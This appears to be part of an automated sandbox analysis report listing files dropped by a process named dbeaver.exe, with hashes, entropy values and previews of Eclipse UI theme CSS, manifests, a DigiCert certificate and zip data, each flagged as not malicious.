      Preview:PK........V.fW................META-INF/MANIFEST.MF.V.r....;...p.[..$&.../.@....BS/:.R.....ol..W..j. ....=.f*f..A.;+..~.?..]..f.....3h........._...R]..fP...8AGO....k.......=$...x...&.....r..7....}6I2....Os.-.n...]..n.`...f.x.....%0.[..A.8Fup..}...$..^[.V./,....6C.d.hiX.~|{.....@.l.3.G..[.A<..Iv.........}.....];.@7+b.G.W...K.W..ch..H?.......;..~.BF{>...yj._y9B....J.K?K.....nb...t..*.i...f..~...C..f.........C..g..Y@....W.$j...%q.w.|VE....."....A.b...w..=.>|. L...m...jO2B_.t...${^h....u[.....=.f......A.?B.}..^e.Fj..`..c.+..<.&..=.....K.4I.,.......m[..'..............F.s..Oux.m...N.e.W.$.}|..+..I........Q.G.L\M6z...=b...8Z....-.TmE.%u3Nr...v+..B.; ....Q..%.P.m..'..b..4h......Z..C....Xp%.g5.F..U..ty......f).^..ut..9...'Mt.#J.p......<...KO.>:....)..;.(Mr..?z...}....F.%@..1......*....M.$...z...E..!) ..../.E#..o.;3;.....pW.{i]-(.5QM..p7U..+...b....o....k..V.L....f...1.[7".E}I.K#.C..\. z..fI[z....v:..9...~1.N.Wqf=....8`......G.....4i.7.y...,).....#..Z-G.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):54540
      Entropy (8bit):7.985024726952115
      Encrypted:false
      SSDEEP:
      MD5:8CD3CCA7A73D3C6B3944AC280070D143
      SHA1:A30C9589EB4B1610DD1198C531EB4AC060A891D9
      SHA-256:C2215DD390D75FCD98B9668048AF79D0924F87114087F4EEA66B0A5582C0CD49
      SHA-512:A4691AED4ABF5F496CD6FDDDFEB6E8A5B0826A11C20FCF37ED6716719B88BBECE1B23C33D009DFE4FE018F2B4FB5817B28EAE78B402D50F9A2526463FCE568EB
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ru.properties.].s.F.~._...J6U^."AY..}..x......+..J8....-+...........%..!.B.3......i...].~L..l0{....q..Q...M.'...R..wY.......3...`..S5....O~..}..(..A..*....."...q....w.o.N...|...v...~Nv..?G.Ov?.3...`.O1...d\}.._:....K^....V..U<.U. .._Z....^..Zi&U59R.#.l..Nw?/......[e..9.t.....^..[..T.0.A6U.m=....~...^...%.sNH)> ......e....z.'Y1..P..ck .`.F.j.$*;..G.".m.O~..I.8.AM.O.g.....8..LyV..MP..|.1..EHS:...y.?.0H..d.F.0.MA*....4.>.!.x...sA..@.......V.m...a2P.....y...>...xN.a...).1WA.S.z(.. _==8.n.0..o.PT.....lV..0)5U..a..R1.*r......)0UD.[ImA.;Iu...l...}...T.c..E...u......1...1l=.=....7.7.......I..A.....G...7.-.%...E.o..(....w...;.\.c.\...A..u...1.~.k.....y..v./^s1...W.VQ........%1n....Q..!.........'.A.....pVQ{....0.x.f.VK.i1.....x.Z`C@'...^....3..}.y...^....h}.p.#.X....S.g*J..B/.f:..N..y.ahl..Y./...7.....f .`ui....3..K.B%..V..6..J..2...{......D.M.Gi...U...[...?>5.h).l.rcF%.c..<..5%..PM.f...Y...jZ.V*.....O.>....@...j.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):212
      Entropy (8bit):4.97640816846625
      Encrypted:false
      SSDEEP:
      MD5:8685463180859445EE6EA356E5B49FF5
      SHA1:ADBC19A65FF9231265CC83DEB251B4D0439DE0BD
      SHA-256:CFCF291C3029906DE192C54888363FCE6F148B363468D7E4944DF9120DFD1D16
      SHA-512:8CFF51268A59577972A7069273524B80E6A65F1F67391C99560299854A81C3908A51B8CF5667F0A43A2B8771ADDE04763EA53FBA6D6A7C555D103A3764EEC483
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<component name="org.eclipse.ui.themes_1.2.2300.v20230807-1354" version="1.2">. <plugin id="org.eclipse.ui.themes_1.2.2300.v20230807-1354"/>.</component>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.572107777498813
      Encrypted:false
      SSDEEP:
      MD5:E704EA7A75B0B56C3E7CB1C0AE1D18EA
      SHA1:DBB153E58AF773451E430D9418315E9ABBE24EBD
      SHA-256:984C69EAA94C106206B4B2C5E7A5F82C8C1EF6A1EA160A043B72DCE172AFC27E
      SHA-512:B91F79EFADAB17A3CB40E51171BC05C8A6BDFC4560842B64016DA54BEE48B7751C0AE4805A18408B00E241C587D2F8FA4B35D93A47EBC4853F9E17971D3EA09E
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):2762
      Entropy (8bit):5.8724391149163235
      Encrypted:false
      SSDEEP:
      MD5:A4E460C55685F165B2380D4B4FD1F204
      SHA1:22A369D040A1AEC66A94E5344EE2E1E9C5C481C0
      SHA-256:7775D4886D16061862072CF58D264D262758685814EE8EED3FB614D95C4B110A
      SHA-512:608E5F9DFBF9A39290618E831DB5ABC4C741A54C240F7F66362AD44604BFA9B635CBB9E04171E468F65845F83E669C0B3115388C09660F5362E62BA6DDA7ECBE
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: JwVjm0pujwBnyNuSblDkr1690NwDAO4n+SI7rj6GUlQ=..SHA-256-Digest-Manifest-Main-Attributes: 7RrhUCVCgMLg+P+CZvL6hdRrqGKZ3Mm.. K8AJkEouyDEU=....Name: plugin.xml..SHA-256-Digest: JrwWGtMXrdV6j7Y4HCTU1vEb3SEex4HF00F5D2u9BSI=....Name: css/e4_default_gtk.css..SHA-256-Digest: ObHN+2H3g9DsYDlArMghbBgYyiY2rl16+Ibjyh+QJ64=....Name: css/high-contrast.css..SHA-256-Digest: FJlJvsthZMNLfX82iF3yekfdgVyM9FU6LARCyvYKbFM=....Name: css/e4-dark_mac1013.css..SHA-256-Digest: OBt4pp8DFlyU7zYW++637hWcTLwSSRS1nA1DAvmxPwo=....Name: css/e4-dark_mac.css..SHA-256-Digest: 2Z4LZXUZh/4sVqsF9+3h4/PCga0FfTtAprST3qP6YEI=....Name: css/dark/e4-dark-drag-styling.css..SHA-256-Digest: HWLiLpa9W5XkeSS+u80O2dvHtdhmamUi0W6SHSDh6No=....Name: css/e4-dark_linux.css..SHA-256-Digest: X6puWWTzfMctHLho8DmjqukR90Wv3q5KhK4SXFl+Ntg=....Name: css/light/e4-light-drag-styling.css..SHA-256-Digest: NpAgE1usgpuJvqVTmREcDGVDxmx0jwzDeX+v7hPHlgg=....Name: css/e4-
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3165
      Entropy (8bit):5.820499717512779
      Encrypted:false
      SSDEEP:
      MD5:3C3ABD45400CBA71A8930931DD06E6F5
      SHA1:770CCA43E7A7D96D369E5DCCB367834F3DC2505F
      SHA-256:2705639B4A6E8F0067C8DB926E50E4AF5EBDD0DC0300EE27F9223BAE3E865254
      SHA-512:C323AF3DD6B96D19A184E31239660D628B77089A3976B18AF8461E4669921DC60836D36698180ADCD0A43204CF411C1EF9999C0C4E59070CA43D980489659573
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.0..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: %Plugin.name..Bundle-SymbolicName: org.eclipse.ui.themes;singleton:=true..Bundle-Version: 1.2.2300.v20230807-1354..Bundle-Vendor: %Plugin.providerName..Bundle-Localization: plugin..Require-Bundle: org.eclipse.e4.ui.css.swt.theme..Eclipse-BundleShape: dir..Automatic-Module-Name: org.eclipse.ui.themes..Eclipse-SourceReferences: scm:git:https://github.com/eclipse-platform/ec.. lipse.platform.ui.git;path="bundles/org.eclipse.ui.themes";tag="I202308.. 07-1800";commitId=1dc77e0823e8b8bfb703ac2ea9c53266555a629e....Name: plugin.xml..SHA-256-Digest: RmYmt4hlsVugrL3V/kupaa7tEvUgxgthy/svvnUVBSE=....Name: css/e4_default_gtk.css..SHA-256-Digest: QaYKE1X4ogAUJ8HECs6Rx3fYFakwPLuiQwGpgTLTqZI=....Name: css/high-contrast.css..SHA-256-Digest: +BsdcwKs6KAi3JzEdT0j3XdpBTX0FKWB2Sy1pI0E0wY=....Name: css/e4-dark_mac1013.css..SHA-256-Digest: 9qA03SV5mXNVgoc2c9cjytldWXP2Ujb3vRx3H1ihQlg=....Name:
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):761
      Entropy (8bit):4.690896104719929
      Encrypted:false
      SSDEEP:
      MD5:2F873526CA67C9CB08DAA121A7D8BB41
      SHA1:D9A3B3D4993129792885891285F6108BCC2F687B
      SHA-256:4AE6D1B52E787C04D75F49B83420C7D5A3DD037DE992B9F770BE094A720B7047
      SHA-512:E2D380C4059CBD77ABB2314F7C8C08C3B2ABED1A314CEBD3F92E3FE34339F7D268861B890300830C46823CAC617829617A84F80311FBC57550C8A1AE09114EB6
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. *******************************************************************************/. ..MTrimmedWindow.topLevel {..margin-top: 0px;..margin-bottom: 0px;..margin-left: 0px;..margin-right: 0px;.}...MPartStack Tree, .MPartStack Table {..font-family: '#org-eclipse-ui-workbench-TREE_TABLE_FONT';.}.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):769
      Entropy (8bit):4.627628880930828
      Encrypted:false
      SSDEEP:
      MD5:A09064FB71D28B919529440AF6BE3CDA
      SHA1:34AB495046AA984F8691DFE824498812345DA21D
      SHA-256:0A955B32709639623B4613C55711AEE5FD851274772AC40AE1989C2E47BB3141
      SHA-512:A361A47198F55DBB9438EE3BD7FA4783CFB8136A1F056EFC99C03BE676C6F96FE1519EA478150B560DBF9DCE4C29BE67886CFC717062BF75851B0A3885AC225A
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2019 vogella GmbH and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Lars Vogel - initial API and implementation. *******************************************************************************/.../* ################################ CSS related to drag and drop ########################## */...DragFeedback {. background-color: COLOR-WIDGET-NORMAL-SHADOW;.}...ModifiedDragFeedback {. background-color: #4176AF;.}..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9029
      Entropy (8bit):5.353555897160124
      Encrypted:false
      SSDEEP:
      MD5:3956E6D0D050FC45297BD5AD80A2DD81
      SHA1:F5E0918EF5714AD3F6E29CA569B63E8B8BFE819A
      SHA-256:08C5141F9C904B75D7C849F75A46D3E97F37C27A1C3BC45CADD27C63883FA5CE
      SHA-512:9AABB4A6C351B13559BC0B13F263470B145E358083738A9E00C399673DEDE43E40764112AECA0FFE2240F3B8B005DB78A3380EDB6AE8F987BC72BDA98E81CE82
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2015 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. * Stefan Winkler <stefan@winklerweb.net> - Bug 434189, 430848. * Simon Scholz <simon.scholz@vogella.com> - Bug 431635. * Fabio Zadrozny <fabiofz@gmail.com> - Bug 465148, 465711. * Lars Vogel <Lars.Vogel@vogella.com> Bug 463652,466275. *******************************************************************************/../*******************************************************************************. * The following bugs are referred to in this style sheet. * 2.) Bug 419
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):8829
      Entropy (8bit):5.482526292094795
      Encrypted:false
      SSDEEP:
      MD5:982CD5301E0701DDED5BCC2BB42AA205
      SHA1:D8EA24A1206374D14D8B90C44F90E3977B82F20D
      SHA-256:076DCA6CEFF50CBB4AF8FAAF83C9F7C97630E1D066777B8AB23AB25AB20429AE
      SHA-512:806D8F93B3746A70CDBE8A933679A693E036D80C828676ABC8E26FC7431A631201A09BB1FDFD5E497BCDF90EE25FB779D1326AC73253D58EFD31EADDC7B05AE4
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Andrea Guarinoni - initial API and implementation. *******************************************************************************/../* ColorDefinitions for the dark theme for the Eclipse IDE.*.* ThemeExtensions and ColorDefinition are mapped to the Colors and Fonts preference.* dialog in the IDE.*/..ThemesExtension { color-definition:. '#org-eclipse-ui-workbench-DARK_BACKGROUND',. '#org-eclipse-ui-workbench-DARK_FOREGROUND',..'#org-eclipse-ui-workbench-INACTIVE_UNSELECTED_TABS_COLOR_START',..'#org-eclip
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3651
      Entropy (8bit):5.2447022947164434
      Encrypted:false
      SSDEEP:
      MD5:B4C82AECC018BB801BB54242E3B9C56E
      SHA1:D667B4CBFB220E438797B043D13776E6733F351B
      SHA-256:1D1CC34C62BF008E5237338D0BAFDEB46AD24E2529A54AABB86386E5D362A6EB
      SHA-512:B1842A94FC456AB8B55865BEEE36021479D8821A2E27B008C844C511299AAC78EB30DBB3D9D6FF6ECEB8D60EABD86BD11C49BF92D208AACB8BBE2F96EE073475
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. * Lars Vogel - initial API and implementation. *******************************************************************************/.../* ################################ CSS for .MParts ########################## */...MPart {. font-family: '#org-eclipse-ui-workbench-TAB_TEXT_FONT';. background-color: #292929;. color: #DDDDDD;.}...MPart.busy {. font-style: italic;.}...MPart.highlighted {. font-weight: bold;.}...MPart Composite,..MPart Composite > *,..MPart Composite >
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3473
      Entropy (8bit):5.583485765469929
      Encrypted:false
      SSDEEP:
      MD5:E1B3F62FCE861F3DD9428DE3AA14EA9D
      SHA1:3D92A45AD66B16AB80EFE9135FD006F331FBACD2
      SHA-256:FC6F842F02320BCA6BD337E37764A886333D11FD8D9E8792929E001D42326852
      SHA-512:EFAC775312B8DA57C2363F05A6152068469EF9AE2304A9A40FD3809E1FA564534DBC11D9CD641593150B7B75AB03C3F1E3048B661B45D6C4140FA7D764F92965
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2014, 2015 Lars Vogel and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Lars Vogel <Lars.Vogel@gmail.com> - initial API and implementation. * Andrea Guarinoni - intial color schema definition. * Lars Vogel <Lars.Vogel@vogella.com> - Ongoing maintenance. *******************************************************************************/../* ############################## Eclipse UI properties ############################## */...IEclipsePreferences#org-eclipse-ui-editors:org-eclipse-ui-themes { /* pseudo attribute added to allow contributions without replacing this node, see Bug 466075 */..preferences:...'AbstractTextEditor.Color.Backgroun
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3770
      Entropy (8bit):5.349994822854019
      Encrypted:false
      SSDEEP:
      MD5:526A9AA30D04EE369177D66C8F4858A8
      SHA1:518309A2186789118945E848BE5C8855DF3CD1C1
      SHA-256:319114A7B31E3EFAC5883FB5FAB9D86A0DBC16720FF41FFDB73799E78D94ADF3
      SHA-512:EC48A8B23E9F02F89F469594954782057DBD18D0FE619584752B9919424A1F5F73986E2E24570A6698A9C7A8608261B465FFA6950C86CBA94185CCCA1DDFB037
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2018 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. * Lars Vogel - initial API and implementation. *******************************************************************************/.../* ################################ CSS for Tabs ########################## */..#org-eclipse-ui-editorss {..swt-tab-height: 8px;.}...MPartStack {. font-family: '#org-eclipse-ui-workbench-TAB_TEXT_FONT';. swt-tab-renderer: url('bundleclass://org.eclipse.e4.ui.workbench.renderers.swt/org.eclipse.e4.ui.workbench.renderers.swt.CTabRendering');.}..CTabFol
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1735
      Entropy (8bit):5.077470731074758
      Encrypted:false
      SSDEEP:
      MD5:965E4A5975A21E7E4DB32CCF953B972E
      SHA1:6D6564683AA7DCED9131260DA261CF1E4DB76C22
      SHA-256:9D826F698B78E488C56A68164AE8DA1EA46F35D629C8CA2C3D1F894F36F242D6
      SHA-512:0F34BC4405A9A5D91562C9706C25828A95FAB3FFBDC95E185F91EB057E9A790B9A11D0C074A75FEE9AC4D41F7907F38A7A2CDD1F20AB051D61AA5029A1C16990
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. * Lars Vogel - initial API and implementation. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/common/e4_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_ide_colorextensions.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_globalstyle.css"); /* Remove this to have ONLY the main IDE shell dark */.@import url("platform:/plugin
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1883
      Entropy (8bit):5.061105801935855
      Encrypted:false
      SSDEEP:
      MD5:5F460112CF7F7E85805FEC3AA8D70A80
      SHA1:6998B241748F63B2643EB2991ECAA0867BF75EE3
      SHA-256:92FEC3CA5DBFB54E8709CFB061FBE9DD9C31ABC0500283A06F11CC883BFFBB09
      SHA-512:5F2B8A0EE5FABF8CDBE018DD0D19C9BD592F34AF74F62E224D2671EF328EAF0347D8446735C6FB1AEC51ED1B6BB4672AE9754E4C2D705CBE694B396604189673
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2019 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/common/e4_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_ide_colorextensions.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_globalstyle.css"); /* Remove this to have ONLY the main IDE shell dark */.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_partstyle.c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2893
      Entropy (8bit):5.121997878122865
      Encrypted:false
      SSDEEP:
      MD5:4F2D21A51210A1B90A6333A7424A6E67
      SHA1:8105D920E2A1CF15D9098D070CC7C7CBBC5AF5CD
      SHA-256:F6A034DD257999735582873673D723CAD95D5973F65236F7BD1C771F58A14258
      SHA-512:B0ECFA6B6A1137D844BB37DF949FACCFF4D486A12ADD0B609475FAB60051F3AADB650F4A6705039095B68A29C9F069E0B73B3E930793880C6537D1E2EA52B30F
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/common/e4_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_ide_colorextensions.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_globalstyle.css"); /* Remove this to have ONLY the main IDE shell dark */.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_partstyle.c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):4979
      Entropy (8bit):5.29273935927384
      Encrypted:false
      SSDEEP:
      MD5:9A68A37481C4193747A2D6A5F76BD1D6
      SHA1:B38EE36D075BE5A7DEA41B080AFB5BA49B926761
      SHA-256:F7AD9906950C6C6A5CECB6282F3BFF60EA086AD7A7028782E3DB50F4F4044D69
      SHA-512:D779499D1BAAD5D2B3FEDB4AD64DB3E51AEBD39337309A2225F740EF4C4FB7495AF836F7F9CD0A80CEB6870A71282A0FC8E9B5636B3654E7291C62D79439805D
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2015 Andrea Guarinoni and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * Andrea Guarinoni <andrea.guarinoni.dev@outlook.com> - initial API and implementation. * Lars Vogel <Lars.Vogel@vogella.com> - initial API and implementation. * Stefan Winkler <stefan@winklerweb.net> - Bug 431845. * Fabio Zadrozny <fabiofz@gmail.com> - Bug 434201, 434309, 430278. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/common/e4_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/dark/e4-dark_ide_colorextensions.css");.@import url("plat
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1152
      Entropy (8bit):4.80289229018878
      Encrypted:false
      SSDEEP:
      MD5:04A3BB49AA02C082DAAFFCBF71CAB454
      SHA1:1578152C0C49E3D0576A8BD2CEB702933D298831
      SHA-256:E44D983799E5FBD5F23EA6DF3D5E31510557CAA91C0AB623B87754460725BEBF
      SHA-512:C5FDA57A5AA7AB0863C56C51B4773C4E5619789E35A96ECA8FAEB88BAE5F932A6BE20F68365948CDB3B93F91B8CABDF334CEA2E708CCB609ACE257F733A5A25F
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/common/e4_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/light/e4-light_globalstyle.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/light/e4-light_ide_colorextensions.css");.@import url("platform:/plugin/org.eclipse.ui.themes/css/light/e4-light_partstyle.css");.@import url("platform:/plu
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1841
      Entropy (8bit):5.398582984258223
      Encrypted:false
      SSDEEP:
      MD5:94D64C8E253744AD986A14AF42C2E64B
      SHA1:C8B313C2BABAC82DA60D2091A450E63F0EB7AE2A
      SHA-256:D70EA04C540208B36F7F1C321667D98D1934DD837FF15F0DB67C65B119CF8CF7
      SHA-512:E66A4820B94535DE2110A373EF2FF21C2E91A1B33B59196E434E75A34035295AE8D1B0FD70B135FCE1C2859FB73C02CF9155955A0405ADF207298E9873C6E5D0
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/...MPart.busy {..font-style: italic;.}...MPart.highlighted {..font-weight: bold;.}...MPartStack, .MPart {..font-family: '#org-eclipse-ui-workbench-TAB_TEXT_FONT';.}..CTabItem:selected {..color: '#org-eclipse-ui-workbench-ACTIVE_TAB_TEXT_COLOR';.}...MTrimmedWindow {..margin-top: 0px;..margin-bottom: 0px;..margin-left: 2px;..margin-right: 2px;.}...MPartStack {..swt-tab-renderer: null;..sw
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2591
      Entropy (8bit):5.501113246470127
      Encrypted:false
      SSDEEP:
      MD5:577CEDEC38D024A5D657CFE4CCBCB2AC
      SHA1:3ED0EB1C9EFEDFDA39EB473D63A60957A2DD956C
      SHA-256:41A60A1355F8A2001427C1C40ACE91C777D815A9303CBBA24301A98132D3A992
      SHA-512:7A7E42529A3E6330F26ECBDE4E1195EED88458870F20CB849ABCF141BE26CF000A83F72DDE24DB9987FBF1385D406B50FBBB47CE244FFA5B8BE36BCF3E153FBD
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2014 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. * Mickael Istria <mistria@redhat.com> - 325937. * Patrik Suzzi <psuzzi@gmail.com> - Bug 501250. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/e4_basestyle.css");..ColorDefinition#org-eclipse-ui-workbench-ACTIVE_UNSELECTED_TABS_COLOR_START {..color: #E1DEDB;.}..ColorDefinition#org-eclipse-ui-workbench-ACTIVE_UNSELECTED_TABS_COLOR_END {..color: #E1DEDB;.}..ColorDefinit
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2939
      Entropy (8bit):5.484148658464258
      Encrypted:false
      SSDEEP:
      MD5:20C396AF98D49A61C7E14069FB01F385
      SHA1:883DF5E54A092AB42A623C2E5B2B4D1CD0EA4885
      SHA-256:FBFC56C18FF9038B3839BB7DF333DB8902B222891ECB84D9C42BF5424618A80F
      SHA-512:AC36B834263175338875CC6492B96820D72FE2711F8CB3044601F67CCC5ED1E1C3717C3CBBDAD19EA95D024CB3E4ECC34DB92A56EEA78938FD1E96A5F4026E0F
      Malicious:false
